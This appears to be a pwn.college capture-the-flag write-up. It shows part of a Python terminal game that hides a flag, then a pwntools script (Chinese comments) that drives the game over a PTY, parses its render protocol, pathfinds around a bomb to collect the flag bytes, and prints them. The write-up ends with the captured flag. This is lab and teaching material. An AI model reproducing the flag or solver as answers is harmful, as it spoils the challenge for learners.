            screen.animate_text("~~~~~ BOOOOOOOOM ~~~~~~", x, y)
            break

        # uncover flag
        if hidden_bytes and key == "l" and hidden_x in (x, x+1, x+2) and hidden_y in (y, y+1):
            revealed_bytes.append([
                hidden_x, hidden_y,
                random.randrange(128, 256), random.randrange(128, 256), random.randrange(128, 256),
                hidden_bytes.pop()
            ])
            bomb_x = random.randrange(w)
            bomb_y = random.randrange(h)
            while bomb_x in (x, x+1, x+2) and bomb_y in (y, y+1):
                bomb_x = random.randrange(w)
                bomb_y = random.randrange(h)
            prev_hidden_x = hidden_x
            prev_hidden_y = hidden_y
            while hidden_x == prev_hidden_x and hidden_y == prev_hidden_y:
                hidden_x = (bomb_x+random.randrange(w-1))%w
                hidden_y = (bomb_y+random.randrange(h-1))%h

        # render everyone
        screen.blank()
        correct_bytes = ''
        for rx,ry,r,g,b,c in revealed_bytes:
            screen.render_patch_monochrome([c], rx, ry, r=r, g=g, b=b)
            correct_bytes += str(c.decode())
        if hidden_bytes:
            screen.render_patch_monochrome(
                [b"?"], hidden_x, hidden_y,
                r=random.randrange(256), g=random.randrange(256), b=random.randrange(256)
            )
        else:
            try:
                while True:
                    screen.animate_text("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!", 10, hidden_y)
                    screen.animate_text("!!! CONGRATULATIONS, YOU DID IT !!!", 10, hidden_y + 1)
                    screen.animate_text(correct_bytes, 10, hidden_y + 2)
                    screen.animate_text("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!", 10, hidden_y + 1)
            except KeyboardInterrupt:
                print(flag.decode(), file=sys.stderr)  # Print decoded flag to stderr
                break

        screen.render_patch_monochrome([b"B"], bomb_x, bomb_y)
        screen.render_sprite(our_sprite, x, y)
        screen.flush()

        key = kb.readchar()

if __name__ == "__main__":
    game()

bypass with the code used in prev challenge

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
import struct
import subprocess

from pwn import *


def solve(known_flag):
    try:
        # PTY 欺骗 termios,PIPE 保证二进制流纯净
        p = process(
            ["/challenge/quest.py"],
            stdin=process.PTY,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )
    except Exception as e:
        return known_flag

    try:
        p.recvn(12)  # 魔数
    except EOFError:
        return known_flag

    state = {
        "px": -1,
        "py": -1,
        "hx": -1,
        "hy": -1,
        "bx": -1,
        "by": -1,
        "frame_flag": "",
    }

    def parse_frame():
        state["px"] = state["bx"] = state["hx"] = -1
        frame_chars = ""
        saw_player = False

        while True:
            try:
                # 超时阻断,防止卡在输入缓冲区死锁
                if not p.can_recv(timeout=0.2):
                    return "TIMEOUT"

                op_bytes = p.recvn(2)
                if not op_bytes:
                    return False
                op = struct.unpack("<H", op_bytes)[0]
            except EOFError:
                return False

            if op == 7:  # RENDER_FRAME
                p.recvn(70 * 20 * 4)
            elif op == 6:  # RENDER_PATCH
                px, py, pw, ph = struct.unpack("<BBBB", p.recvn(4))
                pixels = p.recvn(pw * ph * 4)
                if pw == 1 and ph == 1:
                    # 获取 RGB 和 字符
                    r_col, g_col, b_col, c = pixels[0], pixels[1], pixels[2], pixels[3]
                    if c == ord("?"):
                        state["hx"], state["hy"] = px, py
                    elif c == ord("B") and r_col == 0xff and g_col == 0xc6 and b_col == 0x27:
                        # 只有黄色 (255, 198, 39) 的 B 才是炸弹, Flag may be B
                        state["bx"], state["by"] = px, py
                    elif chr(c) not in (" ", "!", "#"):
                        frame_chars += chr(c)
            elif op == 5:  # CREATE_SPRITE
                s_id, sw, sh = struct.unpack("<BBB", p.recvn(3))
                p.recvn(sw * sh)
            elif op == 4:  # RENDER_SPRITE
                num, r, g, b, px, py, tx, ty, tc = struct.unpack(
                    "<BBBBBBBBB", p.recvn(9)
                )
                if num == 0:
                    state["px"], state["py"] = px, py
                    saw_player = True
            elif op == 2:  # FLUSH (当前帧渲染完毕)
                p.recvn(1)
                if saw_player or "pwn.college" in frame_chars:
                    state["frame_flag"] = frame_chars
                return True
            elif op == 1:  # SLEEP
                p.recvn(4)
            else:
                return False
    def get_best_move(px, py, hx, hy, bx, by):
        """BFS 最短路径寻路"""
        queue = [(px, py, [])]
        visited = set([(px, py)])
        while queue:
            cx, cy, path = queue.pop(0)

            # 3x2 bounding box
            if hx in (cx, cx + 1, cx + 2) and hy in (cy, cy + 1):
                return path[0] if path else "l"

            for key, dx, dy in [("w", 0, -1), ("s", 0, 1), ("a", -1, 0), ("d", 1, 0)]:
                # Toroidal Map Wrapping
                nx, ny = (cx + dx) % 70, (cy + dy) % 20
                # boom here
                if not (bx in (nx, nx + 1, nx + 2) and by in (ny, ny + 1)):
                    if (nx, ny) not in visited:
                        visited.add((nx, ny))
                        queue.append((nx, ny, path + [key]))
        return "SOFTLOCK"

    while True:
        res = parse_frame()

        if res == "TIMEOUT":
            p.send(b" ")
            continue

        if not res:
            p.close()
            break

        # 增量比对:只在提取进度超越已知记录时才打印
        if state["frame_flag"] and len(state["frame_flag"]) > len(known_flag):
            known_flag = state["frame_flag"]
            print(f"[+] Extracted so far: {known_flag}")
            if known_flag.endswith("}"):
                p.close()
                return known_flag

        if state["px"] != -1 and state["bx"] != -1 and state["hx"] != -1:
            move = get_best_move(
                state["px"],
                state["py"],
                state["hx"],
                state["hy"],
                state["bx"],
                state["by"],
            )
            if move == "SOFTLOCK":
                print(
                    f"[*] Soft-lock detected at Target ({state['hx']:02d},{state['hy']:02d}). "
                )
                p.close()
                return known_flag
            p.send(move.encode())
    return known_flag


if __name__ == "__main__":
    print("START")
    current_flag = ""
    while True:
        current_flag = solve(current_flag)
pwn.college{gYs8nkSujIlpvBgfSQmylAnZ9KE.QX0IzMwEDL4cjM1gzW}